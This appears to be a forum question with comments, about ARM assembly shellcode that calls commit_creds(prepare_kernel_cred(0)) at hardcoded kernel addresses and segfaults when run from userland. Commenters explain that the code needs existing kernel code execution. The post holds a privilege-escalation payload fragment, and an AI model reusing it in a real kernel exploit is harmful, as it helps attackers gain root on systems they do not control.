# kernel exploit shellcode on ARM

Tags: assembly, kernel, arm, shellcode

I write some assembly for making kernel exploit shellcode on ARM
`commit_creds(prepare_kernel_cred(0))`
Assembly Code is

```
.section .text
.global _start
_start:
        .code 32
        #Thumb-Mode on
        add r6, pc, #1
        bx r6
        .code 16
        sub r4, r4, r4
        mov r0, r4
        ldr r2, =0x80047dbc    ;prepare_kernel_cred
        blx r2
        ldr r2, =0x80047a0c    ;commit_creds
        blx r2
```

However, when i execute this code, Segment Fault is occured
So, I trace this code on gdb...
It happen Segment Fault at 0x80047dbc
Why 0x80047dbc is not mapped?

Comment: Why would it be mapped?

Comment: I want to call commit_creds(prepare_kernel_cred(0))...
However, Segment Fault is occured at 0x80047dbc(prepare_kernel_cred)

Comment: You need to execute those two when your code is at kernel space, that wouldn't work from userland. So first you need to find a way to execute arbitrary code inside kernel then set root credentials via that exploit.

Comment: Think about it - if the kernel code were mapped into your userspace process and you could arbitrarily jump to it and execute privileged operations, _there wouldn't **be** any security to exploit_. This isn't MS-DOS...